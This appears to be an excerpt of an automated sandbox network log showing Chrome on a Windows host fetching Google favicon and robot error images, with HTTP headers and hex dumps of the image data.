                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR6%`)IDATx]pT>lb(Hv7 D7n8VH_R;ShY`w(*N_R"0`-A|*N`n{&lo;ad$J1*7+coT/~VrDGIcE_FUR&U%X4!!QH";e(Ic
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:11 UTC1390INData Raw: df d8 08 c8 2f 44 6b db ae 38 9e 54 fd 99 be 7f 2b 7f f8 25 56 73 34 14 ce 44 43 1b 52 d1 60 a7 f5 5a 06 df c2 e6 05 c1 bc 0a a2 1f 30 13 5b 29 4e 21 a4 ab 83 95 19 25 fc 3e 26 ec 62 ec 24 92 4d 12 0e d1 d1 50 1a 21 c2 fc 97 21 92 1d c1 de 27 4b 76 a5 e3 b5 4e 64 af a1 b5 6d 76 52 fa 3a 96 4c e9 0b e8 eb 77 0b af 79 25 d6 8e 69 9f 1f 48 eb f2 b0 bb 75 0c d5 ef 89 86 cf 73 dd 53 65 31 b1 5b c5 29 02 22 c7 cd 29 25 d8 85 49 ba 1d d8 91 f8 bc 28 82 23 4d 81 d9 34 ba 40 16 b7 03 9f 23 17 f9 cd e2 1b 58 9f e7 84 50 3c c1 fc 13 6b df 94 b1 67 a4 95 f0 16 4f eb a8 86 df 49 a9 13 3e 2d 9c 02 a2 27 1f 5f e9 51 e1 12 54 ea 79 0f 3d 5a 9e 47 52 7b 5d 14 80 26 74 7d 2a 1a ee c6 e4 bc 8e 94 12 3e 4a 04 9b 21 2c d0 d9 58 36 f3 48 43 a0 1b 24 f1 3a 8e 7d be ec 7a bb da
                                                                                                                                                                                                                                                                                          Data Ascii: /Dk8T+%Vs4DCR`Z0[)N!%>&b$MP!!'KvNdmvR:Lwy%iHusSe1[)")%I(#M4@#XP<kgOI>-'_QTy=ZGR{]&t}*>J!,X6HC$:}z
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:11 UTC1061INData Raw: ab 50 1a 37 9a 50 9e f0 62 0d d1 67 44 a4 6d b3 e8 52 9d 27 0a 80 0c 90 57 cf 83 f3 85 03 40 9a e0 3e 0f 51 30 cf 8d 8d 03 11 18 1d ea 36 e1 00 74 df 9d 6c 69 a7 3e 30 e6 84 85 36 ca 2d d6 73 a1 28 82 e0 63 b9 00 e9 89 af f4 89 40 0a 0f a0 56 28 a2 38 b0 c9 6f 43 dc d5 5c 13 1c e9 cf 25 26 8c 47 6d ca 2e 59 22 c2 4f 6a e2 6d 17 8a 22 40 f0 8a 62 36 7a 8b ac 7f 9e be d1 aa ac 01 cd 89 31 dd 5d e8 11 2a a2 5f cd c6 7d 4c 91 f5 2f 8c 5c d0 c8 65 75 d4 ad 60 2b 09 a0 9b 81 eb 86 a0 f7 36 89 02 70 f3 c7 b9 4d 25 ae 7f dd f6 54 53 42 fb 83 df 92 8e 29 2b c0 42 31 e4 6a a6 8e 85 b1 c2 06 a8 bf a2 62 61 66 d4 10 4f 1d 5a 2f 9e 10 78 4a 4c d1 56 8e b8 b1 15 19 0b 74 19 f4 c6 a3 be 88 7e 23 fa ec 7c 94 2c 68 61 76 db fd 0c ec c6 48 2c 6d 29 b4 c1 6a 99 b2 03 33 d6
                                                                                                                                                                                                                                                                                          Data Ascii: P7PbgDmR'W@>Q06tli>06-s(c@V(8oC\%&Gm.Y"Ojm"@b6z1]*_}L/\eu`+6pM%TSB)+B1jbafOZ/xJLVt~#|,havH,m)j3


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          19192.168.2.749756142.250.186.1744435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:11 UTC671OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:11 UTC453INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                          Location: https://www.google.com/favicon.ico
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          Content-Length: 231
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:33:37 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 15:03:37 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=1800
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Age: 454
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:11 UTC231INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/favicon.ico">here</A>.</BODY></HTML>


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          20192.168.2.749757142.250.186.1324435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:11 UTC446OUTGET /images/errors/robot.png HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:11 UTC683INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 6327
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Tue, 24 Sep 2024 12:21:01 GMT
                                                                                                                                                                                                                                                                                          Expires: Wed, 24 Sep 2025 12:21:01 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                          Age: 267610
                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:11 UTC707INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 ab 00 00 00 d5 08 03 00 00 00 1f 1e f0 9a 00 00 00 57 50 4c 54 45 9d c7 ed 7a b3 e7 7a b3 e8 d4 e6 f7 9e c7 ee 32 8a db bb d8 f3 ba d8 f3 bb d8 f4 57 9f e1 7b b3 e8 56 9e e1 d4 e6 f8 d3 e6 f7 7a b2 e7 e9 f3 fb 32 89 da 33 8a db ea f3 fc 56 9f e1 32 8a da 9d c6 ed 9e c7 ed d3 e5 f7 ba d7 f3 e9 f2 fb ea f3 fb 57 9f e2 ff ff ff 3e 60 10 a0 00 00 00 1d 74 52 4e 53 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 59 86 e7 6a 00 00 17 f2 49 44 41 54 78 01 b5 c1 07 42 63 49 0c 40 41 a9 73 ff e4 48 58 e9 dd ff 9c 6b c3 30 63 1b 93 0c 54 09 3f 6e c5 2f 11 7e d6 14 97 1e 62 8c fc 02 e1 47 4d de 47 75 cf 63 e4 e7 09 3f aa 7b 35 88 35 b8 cc fc 34 e1 27 15 6f 3c 93 1c f8 69
                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDRWPLTEzz2W{Vz23V2W>`tRNSYjIDATxBcI@AsHXk0cT?n/~bGMGuc?{554'o<i
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:11 UTC1390INData Raw: 27 36 a7 9e 7b 28 3c b9 9b b9 85 70 93 e8 06 c3 3a f1 be e6 21 3d 80 d5 bb 31 87 66 fc 11 22 b7 10 6e f2 38 02 da 8d 0f c4 a2 7e 6f b3 bb 4e fc 33 6c b9 85 70 13 5b 0c a6 c4 c1 2a 0a ef 89 da 93 18 a7 a4 72 0b e1 36 8b f1 ac 7a de 14 ae 28 91 67 31 71 41 85 5b 08 9f 11 8b 71 c6 76 2b 9e d8 26 e7 1c b8 42 7b e1 49 8b 5c f0 ca 2d 84 0f c5 ba f4 ec 89 53 d1 79 26 fb bc d9 0b d7 a8 17 8e 4a e2 82 57 6e 21 7c 44 dc bd 98 e4 99 13 e6 2b 9e 14 cf 79 b7 e5 1a d3 1c 39 a8 81 0b c3 1d b7 10 3e 20 eb 6a 1c c8 c6 f8 c7 b4 f1 a4 b8 7b e4 0d c1 0d b8 4b 5c 58 16 6e 21 bc af 65 e5 49 19 2b 27 c6 ca b3 87 6a bc c5 b2 00 2d 70 41 95 5b 08 ef 32 1f 8c a3 38 67 e7 44 4f bc 23 a9 3f 70 10 06 20 05 2e 8c c2 2d 84 77 35 e7 89 64 f7 81 13 bb ca db 34 e7 ec 1c c4 6e d0 9c 0b 21
                                                                                                                                                                                                                                                                                          Data Ascii: '6{(<p:!=1f"n8~oN3lp[*r6z(g1qA[qv+&B{I\-Sy&JWn!|D+y9> j{K\Xn!eI+'j-pA[28gDO#?p .-w5d4n!
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:11 UTC1390INData Raw: 05 d5 c6 51 4b c5 78 43 09 6b 77 31 6e 24 bc a6 ce 1f 75 1c bd 6e 39 30 1e 24 ea c2 13 db 45 2e d9 10 7a 89 1c a4 94 a2 71 5d 7c 18 dd 0b b7 11 5e 8b 63 e2 49 49 36 85 4d d0 a0 1a 7a 1e e3 ca 2b 47 e6 89 2b 24 04 a9 1c 58 d2 12 b9 ce 4a c8 43 04 e6 b8 e2 6b 84 2b 64 9c 01 4b 21 02 2a 83 fa 2e 94 58 13 77 0b 47 d6 13 57 59 0a 5a b7 06 94 94 9a 71 9d 8c 9b 30 0d 29 f2 45 c2 15 31 14 26 19 1a 07 26 40 13 c0 02 d1 13 47 cb 23 6f b0 a2 21 84 95 41 ac 22 91 2b ac 8c 7d b3 5b 1e f9 2a e1 9a fb 2c 65 e2 49 14 20 2a 07 52 79 f4 c8 41 6f bc 6d 5b 54 43 6a 60 55 52 31 4e 59 15 df 6c b4 46 6a e0 ab 84 ab 8a eb 5d e4 a8 0a 10 07 8e ea 14 3d eb 90 24 2f bc 2f a6 10 c2 0a 5b b5 54 66 5e 44 f5 bc c9 a1 19 d0 94 af 12 ae 6b da 47 2d c5 56 8b 01 35 71 d4 c6 30 88 4a 48 3d
                                                                                                                                                                                                                                                                                          Data Ascii: QKxCkw1n$un90$E.zq]|^cII6Mz+G+$XJCk+dK!*.XwGWYZq0)E1&&@G#o!A"+}[*,eI *RyAom[TCj`UR1NYlFj]=$//[Tf^DkG-V5q0JH=
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:11 UTC1390INData Raw: 1f 7a f4 ec 7d e6 2d 51 67 4e a5 ac 5c 30 30 71 0f de 5b b8 07 cc c5 38 b0 31 44 03 84 d7 4c 1b 78 01 9a 72 90 bc f1 09 51 c2 66 3f 84 66 5c 15 84 53 16 02 6f 88 9e 47 37 cc d3 96 a3 28 d9 9b 81 f0 5a 15 48 0b 10 83 01 96 85 3f 6c 9e 92 06 e3 2d 71 f0 9e d7 21 99 71 c2 cc c0 c6 ca 19 49 bc a9 f9 e8 0c f7 3c 69 2e e2 15 10 5e a9 0b c4 60 60 1e 81 d5 30 f0 87 79 77 0f dd b7 bc 29 ca 10 f6 bd 8f 69 e2 45 eb c1 2b 84 3b ce 14 e5 1d 32 78 36 8e 82 37 cc 77 06 c2 2b 21 42 52 b0 70 0f 4c be 18 2f 54 63 35 f3 02 36 f3 a6 47 0d 3e 66 6f 5b 8e cc 83 f9 18 d1 c4 3f 36 63 91 f7 44 cf 62 40 08 11 30 15 10 2e 15 81 38 18 54 01 4c 83 71 14 ff 03 06 0f bd d7 5c b1 e0 c3 7f bc ad ca ac 79 2d 1c 8d 0d 59 cf a4 60 bc 88 a1 f0 91 69 93 13 44 e7 c8 c2 00 c2 05 0b 11 e4 11 18
                                                                                                                                                                                                                                                                                          Data Ascii: z}-QgN\00q[81DLxrQf?f\SoG7(ZH?l-q!qI<i.^``0yw)iE+;2x67w+!BRpL/Tc56G>fo[?6cDb@0.8TLq\y-Y`iD
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:11 UTC1390INData Raw: 7a 00 e2 58 78 62 b5 cf bc 4d f8 a7 5a 5d f9 c4 57 cc a3 6d 07 35 2e d4 ae fc 11 bd 1b d8 ae 01 65 a7 de fb 7e 48 c6 1f 41 ad 89 ee 2b cf 6a af bc 4d 78 21 e3 7a 93 3d 0f ad 24 89 ab 15 ac f8 98 05 81 41 38 97 bc 67 e5 8f ba 1e 1f 30 55 20 ad f3 fd e3 1c c5 c3 96 67 c1 d7 3e ba 73 30 27 98 5d 78 9b f0 47 cd e3 22 79 3f a6 c1 47 7f 92 e2 8a 0f cc 6d b3 80 04 4e 58 94 ae 53 71 35 9e c9 5e e1 ce 1b a9 6b e5 c0 dc 57 3c 9b 53 69 b6 04 0e da ba 80 27 de 26 fc e1 79 b6 92 37 01 6c 1b a5 25 a9 3e 7a 08 d5 8c b7 ac da d8 93 c1 e4 c6 3f 45 3d cc 10 47 bf 33 9e 14 0f ff 31 04 5c d8 72 60 a9 71 22 7a 03 6c c8 13 0c 0b 7f cd c5 38 23 1c 95 41 7a dd aa e7 2c fc 13 eb e0 e3 6e b7 a4 d9 78 cd d4 3d a4 b4 34 ee 47 e3 85 dd 29 c6 51 ec d9 1f 23 47 ad ef 28 bd f9 03 4f a2
                                                                                                                                                                                                                                                                                          Data Ascii: zXxbMZ]Wm5.e~HA+jMx!z=$A8g0U g>s0']xG"y?GmNXSq5^kW<Si'&y7l%>z?E=G31\r`q"zl8#Az,nx=4G)Q#G(O
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:11 UTC60INData Raw: df 25 fc aa e8 62 40 d2 9c 8c ef 12 7e d7 a4 63 35 93 f5 3e f2 6d c2 6f 2b 7d 18 46 99 f9 3e e1 d7 d9 5c b6 fc 84 ff 01 4e de f0 b9 5c 13 aa be 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                          Data Ascii: %b@~c5>mo+}F>\N\IENDB`


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          21192.168.2.749758142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:12 UTC673OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:12 UTC705INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 5430
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 12:10:12 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 05 Oct 2024 12:10:12 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=691200
                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                                                                                                                                                          Content-Type: image/x-icon
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Age: 9060
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:12 UTC685INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff
                                                                                                                                                                                                                                                                                          Data Ascii: h& ( 0.v]X:X:rY
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:12 UTC1390INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff 3b 49 eb ff 95 9c f4 ff cf d2 fa ff d1 d4 fa ff 96 9d f4 ff 52 5e ed ff e1 e3 fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30 00 00 00 00 fd fd fd 9d ff ff ff ff e8 ea fd ff 58 63 ee ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 6c 76 f0 ff ff ff ff ff ff ff ff ff fd fd fd 98 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd c3 ff ff ff ff f9 f9 fe ff a5 ac f6 ff 5d 69 ee ff 3c 4a
                                                                                                                                                                                                                                                                                          Data Ascii: 7R8F2Vb5C;IR^0Xc5C5C5C5C5C5Clv]i<J
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:12 UTC1390INData Raw: ff ff ff ff ff ff ff ff ff ff ff fd fd fd d0 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd fd fd 8b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b1 d8 a3 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 60 a5 35 ff ca 8e 3e ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 87 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 25 fd fd fd fb ff ff ff ff ff ff ff ff ff ff ff ff c2 e0 b7 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 6e b6 54 ff 9f ce 8d ff b7 da aa ff b8 db ab ff a5 d2 95 ff 7b bc 64 ff 54 a8 35 ff 53 a8 34 ff 77 a0 37 ff e3 89 41 ff f4 85 42 ff f4 85 42 ff
                                                                                                                                                                                                                                                                                          Data Ascii: S4S4S4S4S4S4S4S4S4S4S4S4S4S4`5>%S4S4S4S4S4S4nT{dT5S4w7ABB
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:12 UTC1390INData Raw: ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fb d5 bf ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd cb ff ff ff ff ff ff ff ff ff ff ff ff 46 cd fc ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 21 ae f9 ff fb fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd c8 fd fd fd 9c ff ff ff ff ff ff ff ff ff ff ff ff 86 df fd ff 05 bc fb ff 05 bc fb ff 15 93 f5 ff 34 49 eb ff b3 b8 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                          Data Ascii: BBBBBBF!4I
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:12 UTC575INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd 8d fd fd fd fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd fb fd fd fd 8b fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 27 fd fd fd 9f fd fd fd f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                          Data Ascii: $'


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          22192.168.2.749759142.250.186.1324435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:13 UTC434OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:13 UTC705INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 5430
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
